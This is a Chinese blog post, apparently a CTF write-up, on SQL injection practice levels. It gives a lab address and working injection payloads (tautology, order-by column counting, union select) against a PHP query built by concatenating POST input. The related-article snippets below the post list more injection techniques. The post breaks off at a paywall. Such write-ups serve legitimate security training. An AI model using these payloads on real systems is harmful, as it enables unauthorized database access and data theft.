sql 注入练习题

最新推荐文章于 2024-05-16 02:46:29 发布
最新推荐文章于 2024-05-16 02:46:29 发布
阅读量4.4k 收藏 13
点赞数 6
分类专栏: sqli 文章标签: sqli sql注入靶场 ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mr_black666/article/details/79329501
版权

sql注入习题

来源于ctfs.me的一道习题,实在做不出来,google了wp,发现这道题目是引自于其他习题集了,而且原题目是有源码的。。。于是趁机把他的题目做了一遍
http://35.184.20.243:8003/ <——sql注入靶场地址

level1

这道题目其实没有源码也是可以做的,不过需要简单思考一下
$query = "SELECT * FROM secrets WHERE session_id = '" . $_POST['session_id'] . "'";
这个语句,我们需要让where 后面的为true,所以我们需要用到or,比较简单的题目
payload:1' or 1=1 #
在get your secrets里面输入,就可以得到所有的secrets,第一个就是flag

level2

这道题目在ctfs.me上很坑,我不晓得大佬是怎么做的。
假如不给源码,我首先想到的是万能密码登陆,一顿操作之后,发现注入点在用户名的位置登陆不了,gg
换思路,考虑这个登陆的回显
payload:username:1'order by 1# &password=dd
回显: username/password is invalid
payload:`username:1’order by 2# &password=dd’
回显: invalid sql query

可以知道只有一列,所以我们可以看看回显的位置
payload: username=1' union select 1 -- -&password=dd
回显。。。,回显出flag了,但是页面显示的不是真正的,查看源码发现另一个flag,get!

假如给了源码,那就稍微简单一点了 

if (isset($_POST['username']) && isset($_POST['password'])) {

    // $query = "SELECT flag FROM my_secret_table"; We leave commented code in production because we're cool.

    $query =
最低0.47元/天 解锁文章
可乐1997
关注
  • 6
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
一道简单的sql注入题目
weixin_44215027的博客
11-05 1938
一道简单的sql注入题目 好久都没有做ctf的题目了,最近又重新开始回顾了。首先是sql注入。这是一道简单的整数型注入题目。 首先,进入网址:http://www.kabelindo.co.id/index.php 刚开始我以为是搜索框注入,然后我发现我错了。。。。 但是,我看到了news: 这就非常的舒服,进入后果然有一个注入点 加一个单引号,会报错。加 and 1=1,不会报错。说明是一...
网络安全面试题-SQL注入问题总结
m0_60571990的博客
03-25 1562
网络安全面试题-SQL注入问题总结
sql注入1-10题
Camillewuxie的博客
02-08 619
sql注入 Less-1-10题 首先输入?id=1观察页面,发现能登陆, 使用联合注入 (1) 查找几个字段(需输入错误id) ?id=0‘ order by 3–+页面正常 输入?id=0‘ order by 4–+页面错误,说明有三个字段 (2) 爆数据库名 ?id=0’ union select 1,(select database()),3–+ 爆出数据库名 security。 (...
2024年最新CTF Web SQL注入专项整理(持续更新中)_ctf sql注入,一文轻松搞定(1)
最新发布
2401_84968101的博客
05-16 591
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
SQL注入以及一些web题
2401_82388450的博客
04-03 753
1.进入页面,发现输入非零会有回显,输入零和字母就没有回显 2.此题使用堆叠注入,输入1;show databases;显示所有的库3.输入1;show tables;查所有的表4.输入1;show columns from Flag查flag表的字段,发现报错5.猜测过滤了一些内容,这里有两种方法构建payload:1.判断列数2.判断显错位3.爆数据库4.爆表名5.爆字段名6.爆数据,发现只有一半,想到使用substring()函数7. 发现substring()函数被过滤,使用mid函数,爆出后一半f
SQL注入的相关例题(ctfhub)
2401_82388450的博客
04-01 788
例题。
SQL注入练习.rar
06-25
"SQL注入练习.rar" 提供了一个名为 "sql-labs" 的练习环境,专为学习和提升SQL注入技能设计。这个靶场环境采用闯关模式,由浅入深地涵盖了一系列SQL注入技术,帮助用户逐步理解并掌握这种攻击手段。 在开始之前,...
SQL注入源码
02-21
在“SQL注入作业”这个文件中,我们可能会看到一些练习题或者示例代码,用于帮助开发者理解和实践上述防注入策略。这些练习可能包括构造恶意输入,以及编写相应的防御代码。通过实践,开发者能更好地理解SQL注入的...
sql_lab_第5关 Python源码SQL注入
04-25
SQLI-LAB是专门练习SQL注入的实验环境,最新有69道题涵盖了SQL注入的所有分类,相关下载链接:https://github.com/Audi-1/sqli-labs
pl/sql 练习题.
09-07
动态SQL允许在运行时构建和执行SQL语句,增强了灵活性,但需谨慎处理SQL注入问题。 通过练习PL/SQL题目,你可以加深对这些概念的理解,提升数据库编程技能。这些题目可能涵盖以上提到的所有知识点,从简单的变量...
Oracle的sql语句练习题及参考答案
10-26
在“Oracle的SQL语句练习题及参考答案”中,我们很可能会遇到各种与`SELECT`语句相关的练习,这是SQL中最基础且最重要的部分。 `SELECT`语句用于从数据库中检索数据,其基本语法结构如下: ```sql SELECT column1,...
考试必备SQL试题
12-04
.net考试相关的一些SQL试题含答案,希望对你有用!
SQL注入相关【面试题】
热门推荐
anan的博客
12-09 1万+
本篇文章主要收集和SQL注入相关的面试题,持续更新,当然由于博主的时间不太充裕,可能更新会不是很及时,但是相信我,再晚,他都会来!
buuctf 刷题5(sql注入篇)
weixin_63231007的博客
05-10 3981
sql注入挺难的我感觉,但是很重要,有好多绕过,和注入手段需要一步步在尝试,因此本章刷一下buuctf各个sql注入题目,来巩固联系一下自己在sql注入方面的知识。 [极客大挑战 2019]HardSQL 1 输入1',出错,1'#显示不同,存在单引号闭合注入。 order by查字段,union,堆叠注入,和输入数字都烦返回错误 =,空格,和好多关键字都被过滤了。 空格用()绕过,=用like绕过。 尝试报错注入: 1'or(updatexml(1,concat...
SQL注入面试题(相关)
xdjxi的博客
02-19 2183
sql注入分类 从注入参数类型分:数字型注入、字符型注入、搜索型注入注入方法分:基于报错、基于布尔盲注、基于时间盲注、联合查询、堆叠注入、内联查询注入、宽字节注入 从提交方式分:GET注入、POST注入、COOKIE注入、HTTP头注入 SQL注入原理 服务端没有过滤用户输入的恶意数据,直接把用户输入的数据当做SQL语句执行,从而影响数据库安全和平台安全。 两个条件 用户能够控制输入 >原本程序要执行的SQL语句,拼接了用户输入的恶意数据 WAF的原理 WAF是Web应
SQL注入题目
Pvr1sC的博客
03-17 825
极客大挑战2019 EasySQL 简单题,'发现注入点 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1 写入1’ or 1=1 # [强网杯 2019]随便注 堆叠注入sql中,分号表示一条语句的结束。如果在分号的后面再加一条语句,这条语句也可以
sql注入习题/ctfs.me sql injection
agacx42680的专栏
02-16 313
sql注入习题 来源于ctfs.me的一道习题,实在做不出来,google了wp,发现这道题目是引自于其他习题集了,而且原题目是有源码的。。。于是趁机把他的题目做了一遍 level1 这道题目其实没有源码也是可以做的,不过需要简单思考一下 $query = "SELECT * FROM secrets WHERE session_id = '" . $_POST['session_id'...
SQL注入题1
慢慢变小佬的博客
07-06 757
service mysql start;mysql -u root -q;use mysql;show databases;id=1 order by 3 判断列数id =-1 union select 1,2,3 判断出现位数id=-1 union select 1,use(),database() 查询数据库名id=-1 union select 1,(select table_name fr...
CTF-SQL注入
weixin_44770698的博客
06-16 5008
CTF-SQL注入题目整理
CTFsql注入练习题
07-29
回答: CTFsql注入练习题是一种用于训练和测试SQL注入技巧的题目。在这些题目中,参与者需要通过注入恶意的SQL代码来绕过应用程序的安全机制,从而获取敏感信息或者执行未授权的操作。这些题目通常包含了不同的注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值